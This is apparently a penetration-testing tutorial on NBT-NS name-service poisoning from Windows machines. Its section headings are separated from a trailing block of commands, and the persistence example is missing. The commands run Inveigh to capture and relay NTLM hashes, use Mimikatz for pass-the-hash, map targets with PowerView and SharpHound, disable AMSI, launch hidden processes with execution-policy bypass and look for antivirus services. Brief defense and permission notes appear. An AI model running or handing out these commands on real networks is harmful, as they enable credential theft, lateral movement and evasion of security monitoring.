NBT-NS (NetBIOS Name Service) poisoning can also be performed from Windows systems. This approach offers certain advantages, particularly in environments where running Linux tools might trigger security alerts. This guide covers the techniques, tools, and considerations for performing NBT-NS poisoning attacks from Windows platforms.
Understanding NBT-NS in Windows Environments
NetBIOS Name Service resolution is native to Windows systems, which provides both advantages and challenges when conducting poisoning attacks from Windows:
Native Integration: Windows tools can interact with NBT-NS more naturally
Bypassing Defenses: Security tools may not flag Windows utilities as suspicious
Persistent Access: Can be configured as a service for long-term poisoning
Required Tools
To perform NBT-NS poisoning from Windows, you'll need one or more of the following tools:
Inveigh: PowerShell-based tool for LLMNR/NBT-NS/mDNS poisoning
Responder for Windows: Windows port of the popular Linux tool
PowerShell Empire: Has modules for LLMNR/NBT-NS poisoning
Metasploit: Contains auxiliary modules for poisoning attacks
Using Inveigh
Inveigh is the most powerful native Windows tool for NBT-NS poisoning.
Installation
Basic Usage
Parameter Explanation
NBNSPriority: Sets priority for NBT-NS over other protocols
NBNS: Enables/disables NBT-NS spoofing
NBNSTypes: Specifies NetBIOS suffixes to respond to
HTTP/HTTPS: Enables/disables HTTP/HTTPS listeners
SMB: Enables/disables SMB listener
Viewing Captured Credentials
Inveigh Relay Setup
Inveigh-Relay extends Inveigh's functionality to perform relay attacks:
Inveigh.exe (C# Version)
The compiled C# version of Inveigh offers better performance and fewer detection issues:
PowerShell Empire Approach
If you're using PowerShell Empire, you can leverage its built-in modules:
Metasploit Framework Approach
Metasploit includes modules for LLMNR/NBT-NS poisoning:
Advanced NBT-NS Poisoning Techniques in Windows
Persistent NBT-NS Poisoning
To maintain poisoning across reboots or user sessions:
Example Inveigh-Persistent.ps1:
Targeted Poisoning
For more precise targeting:
Relay Attacks with Inveigh and CrackMapExec
Using Inveigh to capture and CrackMapExec to reuse credentials:
Capture hashes with Inveigh
Extract the NTLMv2 hash from the output
Use the hash with CrackMapExec from another system
Defending Against Windows-Based Poisoning
Windows-based NBT-NS poisoning may be more difficult to detect than Linux-based attacks. Consider these defense techniques:
Network segmentation: Limit broadcast traffic between network segments
Windows Defender Advanced Threat Protection: Can detect Inveigh and similar tools
AppLocker/WDAC policies: Prevent unauthorized PowerShell scripts from running
Network monitoring: Look for unusual NBT-NS response patterns
Combining with Other Windows Attack Techniques
NBT-NS poisoning pairs well with other Windows attack techniques:
With Mimikatz
With PowerView
With BloodHound
Evading Detection on Windows
When performing NBT-NS poisoning from Windows, consider these evasion techniques:
PowerShell Script Obfuscation
AMSI Bypass
Process Isolation
Practical Scenarios for Windows-Based Poisoning
Internal Penetration Testing
During internal penetration testing, Windows-based NBT-NS poisoning offers several advantages:
Blend in: Looks like normal Windows traffic
Endpoint testing: Test endpoint security controls directly
Policy testing: Evaluate PowerShell restrictions and application whitelisting
Post-Exploitation
After gaining access to a Windows system:
Network Lateral Movement
Use NBT-NS poisoning to expand access through the network:
Compromise initial Windows system
Run Inveigh to capture credentials from other segments
Use captured credentials to move laterally
Repeat process in new network segments
Comparing Windows vs. Linux Poisoning Approaches
Aspect
Windows-Based
Linux-Based
Stealth
Higher (looks like normal Windows traffic)
Lower (unusual for Linux to respond to NBT-NS)
Ease of setup
More complex (PowerShell restrictions)
Simpler (tools designed for this purpose)
Performance
Variable (depends on host resources)
Generally higher
Persistence options
More native options
Requires custom solutions
Detection likelihood
Lower (if properly executed)
Higher (abnormal network behavior)
Legal and Ethical Considerations
Only perform NBT-NS poisoning on networks where you have explicit permission
Document all activities thoroughly
Store captured credentials securely
Remove all poisoning tools when testing is complete
Reset any modified system configurations
Conclusion
Windows-based NBT-NS poisoning provides a powerful and potentially stealthier alternative to traditional Linux-based approaches. By leveraging native Windows tools like Inveigh, attackers or penetration testers can capture credentials while blending in with normal network traffic. Understanding these techniques is essential both for offensive security professionals and defenders building comprehensive security controls.
# Install from PowerShell Gallery (if Internet access is available)
Install-Module -Name Inveigh
# Alternatively, download and import manually
Import-Module .\Inveigh.ps1
# Start Inveigh with default settings
Invoke-Inveigh
# For more targeted NBT-NS poisoning
Invoke-Inveigh -NBNSPriority Y -NBNS Y -NBNSTypes 00,03,20,1B -HTTP N -HTTPS N -SMB Y
# Display captured credentials
Get-Inveigh
# Export Inveigh output to a file
Get-Inveigh -Log | Out-File -FilePath C:\path\to\inveigh_output.txt
# Import Inveigh-Relay
Import-Module .\Inveigh-Relay.ps1
# Start Inveigh for capturing
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -SMB N
# In another PowerShell window, start relay
Invoke-InveighRelay -ConsoleOutput Y -Target 192.168.1.10 -Command "whoami"
# Run Inveigh.exe with NBT-NS poisoning
Inveigh.exe -nbns y -nbnstype 00,03,20,1B
# Specify output file
Inveigh.exe -nbns y -fileoutput c:\temp\inveigh.txt
# From an Empire agent
usemodule collection/inveigh
# Set options
set NBNS true
set ConsoleOutput true
# Execute
execute
# In Metasploit console
use auxiliary/spoof/llmnr/llmnr_response
set INTERFACE <your_interface>
run
# For NBT-NS specifically
use auxiliary/spoof/nbns/nbns_response
set INTERFACE <your_interface>
run
# After capturing hashes with Inveigh, use Mimikatz to perform pass-the-hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.local /ntlm:hash /run:powershell.exe"'
# Use PowerView to find additional targets after initial compromise
Import-Module .\PowerView.ps1
Find-LocalAdminAccess
# Collect data for BloodHound to identify attack paths using the captured credentials
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
# Use obfuscated versions of Inveigh
Import-Module .\Inveigh-Obfuscated.ps1
# Attempt to bypass AMSI before loading Inveigh
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Run in a separate PowerShell process
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File .\RunInveigh.ps1" -WindowStyle Hidden
# Check for AV/EDR
Get-Service | Where-Object { $_.DisplayName -like "*Defender*" -or $_.DisplayName -like "*Symantec*" -or $_.DisplayName -like "*McAfee*" }
# Check PowerShell execution policy
Get-ExecutionPolicy
# Run Inveigh with appropriate settings based on environment
Invoke-Inveigh -NBNS Y -NBNSTypes 00,20 -ConsoleOutput Y